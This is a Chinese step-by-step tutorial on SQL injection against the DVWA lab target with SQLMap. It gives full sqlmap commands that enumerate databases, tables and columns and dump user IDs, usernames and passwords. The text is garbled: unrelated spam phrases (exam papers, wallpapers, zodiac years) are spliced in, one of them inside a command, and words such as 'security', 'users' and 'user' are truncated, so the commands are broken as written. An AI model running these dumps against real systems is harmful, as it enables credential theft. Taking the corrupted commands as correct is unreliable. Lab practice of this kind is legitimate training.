1989属蛇>右转弯手势于欢案SQL注⼊、SQLMap⼯具、DVWA(靶机)
⼀、需要准备的⼯具或环境:浏览器、DVWA(靶机)、Python2、SQLMap
说明:Python2的作⽤是运⾏SQLMap
绿色青春⼆、操作步骤:
1、通过浏览器的F12开发⼯具或其他开发⼯具,获取⼀个请求(访问的ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#)
2、利⽤SQLMap⼯具探测所有数据库
输⼊命令:sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="curity=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --dbs --batch
四年级上册数学期末试卷及答案
探测出的所有数据库名如下图:
3、利⽤SQLMap⼯具探测当前数据库,则只需要把选项"--dbs"改为“--current-db”即可,
输⼊命令:sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="curity=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --current-db --batch,探测出的当前数据库名如下图:
一个苹果多重
4、利⽤SQLMap⼯具探测当前数据库(dvwa)下的数据表名,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --
win7桌面壁纸
cookie="curity=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --table -D "dvwa" --batch,探测出的表名如下图:
5、利⽤SQLMap⼯具探测当前数据库(dvwa)下⼀个数据表(urs)⾥的列名,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="curity=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --columns -T "urs" -D "dvwa" --batch,探测出的列名如下图:
6、利⽤SQLMap⼯具探测当前数据库(dvwa)下⼀个数据表(urs)⾥指定列名(ur_id,ur,password)的数据,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie="curity=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35
党建主题" --dump -C "ur_id,ur,password" --columns -T "urs" -D "dvwa" --batch,探测出的数据如下图:
三、总结:先获取⼀个请求,然后使⽤SqlMap⼯具探测数据库,探测出数据库名后再依次探测数据表名、列名和数据。